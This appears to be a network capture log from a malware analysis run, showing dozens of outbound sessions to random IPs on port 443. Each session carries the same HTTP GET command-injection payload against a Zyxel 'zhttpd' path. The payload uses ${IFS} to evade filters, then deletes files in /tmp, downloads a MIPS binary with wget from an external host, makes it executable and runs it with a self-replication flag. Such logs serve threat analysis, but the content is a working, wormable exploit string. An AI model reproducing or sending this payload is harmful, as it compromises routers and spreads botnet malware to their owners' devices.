                                    Jan 13, 2024 19:02:40.328880072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6062192.168.2.133977057.193.140.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328927994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6063192.168.2.134267244.199.56.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.328975916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6064192.168.2.1360428152.65.190.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329050064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6065192.168.2.13420761.221.124.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329071045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6066192.168.2.135276065.222.125.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329113960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6067192.168.2.134217681.161.182.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329186916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6068192.168.2.134494662.228.189.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329267025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6069192.168.2.134415865.196.17.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329312086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6070192.168.2.1355724175.121.10.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329379082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6071192.168.2.1337742178.237.70.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329432964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6072192.168.2.1345666134.46.234.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329479933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6073192.168.2.1359258218.79.43.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329536915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6074192.168.2.134854294.153.104.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329591990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6075192.168.2.134693286.7.38.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329637051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6076192.168.2.135389097.227.140.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329701900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6077192.168.2.1347392161.147.84.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329741955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6078192.168.2.134672490.112.5.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329802036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6079192.168.2.13437704.121.211.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329871893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6080192.168.2.134781465.119.126.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.329947948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6081192.168.2.133477619.66.101.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.330019951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6082192.168.2.135159649.39.106.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.330060959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6083192.168.2.133689840.96.120.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.330188990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6084192.168.2.1351492218.106.35.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.330246925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6085192.168.2.1350262152.124.143.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.335376024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6086192.168.2.135778417.173.205.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.335414886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6087192.168.2.133536443.66.137.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.335483074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6088192.168.2.133827827.153.229.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.335541010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6089192.168.2.1348140152.52.225.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.335607052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6090192.168.2.13343508.178.74.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.335664988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6091192.168.2.1355952133.216.121.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.335706949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6092192.168.2.1348726146.3.238.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.335758924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6093192.168.2.1354330150.107.41.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.335812092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6094192.168.2.1341168100.8.253.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.343687057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6095192.168.2.1351894170.243.67.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.343780994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6096192.168.2.13352189.238.118.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.343823910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6097192.168.2.135909888.110.129.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.343900919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6098192.168.2.1336260111.89.150.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.343976021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6099192.168.2.1333160197.30.0.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344036102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6100192.168.2.1358538101.34.65.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344072104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6101192.168.2.1341770140.248.49.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344130039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6102192.168.2.1337206132.1.73.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344198942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6103192.168.2.1338264106.239.247.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344269037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6104192.168.2.135371698.101.78.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344305992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6105192.168.2.1352550158.11.20.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344362020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6106192.168.2.1335114170.233.98.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344391108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6107192.168.2.1333416114.144.97.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344438076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6108192.168.2.134119886.247.65.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344496012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6109192.168.2.133460085.113.168.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344535112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6110192.168.2.13503145.223.194.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344610929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6111192.168.2.1354268223.214.179.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344649076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6112192.168.2.135678414.163.213.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344679117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6113192.168.2.1334280188.188.235.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344731092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6114192.168.2.134888453.29.150.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344780922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6115192.168.2.1360540117.33.190.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344855070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6116192.168.2.135437065.111.21.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344918013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6117192.168.2.135600453.180.150.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.344983101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6118192.168.2.1354074141.183.107.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345026970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6119192.168.2.135433878.86.212.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345098972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6120192.168.2.1337586145.238.161.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345141888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6121192.168.2.1339214141.125.110.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345233917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6122192.168.2.13463905.126.192.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345264912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6123192.168.2.134476296.85.182.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:41.345324993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6124192.168.2.134313458.188.76.104443
                                    TimestampBytes transferredDirectionData
